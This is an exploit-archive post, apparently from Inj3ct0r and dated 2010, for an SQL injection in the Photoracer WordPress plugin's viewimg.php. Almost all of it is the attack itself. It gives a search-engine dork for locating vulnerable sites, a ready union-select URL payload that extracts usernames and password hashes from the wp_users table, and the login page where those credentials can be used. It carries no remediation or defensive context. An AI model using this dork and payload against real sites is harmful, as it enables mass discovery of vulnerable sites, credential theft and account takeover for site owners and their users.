Home / os / win7

WordPress v1.0 SQL Injection Vulnerability

Posted on 14 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>WordPress v1.0 SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================== WordPress v1.0 SQL Injection Vulnerability ========================================== ####################################################### # IN THE NAME OF GOD # # WORDPRESS v1.0 SQL Injection Vulnerability # # Author : HELLBOY # # Tested on Lunix # # CVE : N/A # # Gmail : A68.HELLBOY@GMAIL.COM # # Dork : inurl:&quot;wp-content/plugins/photoracer/viewimg.php?id=&quot; # ######################################################## # Exploit : # http://[site]/wp-content/plugins/photoracer/viewimg.php?id={SQLI} # # EXAM: http://[site]/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users-- # # PAGE LOGIN : http://[site]/wp-login.php # ######################################################### # Greetz : # All members of the Forum WwW.ASHIYANE.ORG # ######################################################### # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP